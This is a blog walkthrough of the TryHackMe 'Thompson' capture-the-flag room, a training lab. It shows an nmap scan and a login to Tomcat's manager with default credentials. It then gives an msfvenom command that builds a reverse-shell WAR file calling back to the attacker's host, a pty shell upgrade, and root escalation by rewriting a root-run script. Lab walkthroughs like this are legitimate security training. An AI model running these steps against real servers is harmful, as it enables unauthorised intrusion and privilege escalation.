CatSec.org

Thompson

In this post, we will look into the room “Thompson” from TryHackMe, which can be found on https://tryhackme.com

Let’s run a port scan:

nmap -sV -A $IP

Commands:

-A – aggressive scan – basically it runs scripts for common things so you can better understand what you can find useful and what is useless.

-sV – version detection – great for searching exploits related to that version of the running services

The output looks like this:

Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-13 07:27 EDT
Nmap scan report for 10.10.60.241
Host is up (0.055s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 fc:05:24:81:98:7e:b8:db:05:92:a6:e7:8e:b0:21:11 (RSA)
|   256 60:c8:40:ab:b0:09:84:3d:46:64:61:13:fa:bc:1f:be (ECDSA)
|_  256 b5:52:7e:9c:01:9b:98:0c:73:59:20:35:ee:23:f1:a5 (ED25519)
8009/tcp open  ajp13   Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8080/tcp open  http    Apache Tomcat 8.5.5
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/8.5.5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We can see that the box is running apache tomcat on port 8080. Now let’s open it in our web browser:

The default page for Tomcat… Hmm, let’s try to login into “manager app” using the default credentials we found in google. Now if we scroll down we can see that there is an upload form for WAR files. Let’s use msfvenom to create a payload and upload it:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=$yourip lport=4444 -f war > shell.war

Commands:

-p – used to specify the payload

-f – format for the file

Now we can use metasploit to start a reverse tcp handler and get a shell:

Let’s upload the file to the tomcat server. Now you can see the file that we uploaded. Press it and you should get a reverse shell on your attacking box:

We can use the python command to spawn a normal tty shell:

python -c 'import pty; pty.spawn("/bin/sh")'

Now we can head into /home/jack and cat out the user.txt file. Now for root let’s try with “sudo -l” – we don’t know the password for tomcat. Now let’s see what we have in the home directory. There are 3 files:

Let’s open test.txt. Some id information about root and if we check id.sh there is a interesting script:

#!/bin/bash
id > test.txt

Now we can use the command “echo” to insert a command into the file “id.sh” :

echo "cat /root/root.txt > test.txt" > id.sh

*don’t forget to put only one “>” otherwise you wont clear the content of the id.sh*

We can cat id.sh to see if we made everything correct. Okay perfect. Not if we cat “test.txt” we get the root flag. Great.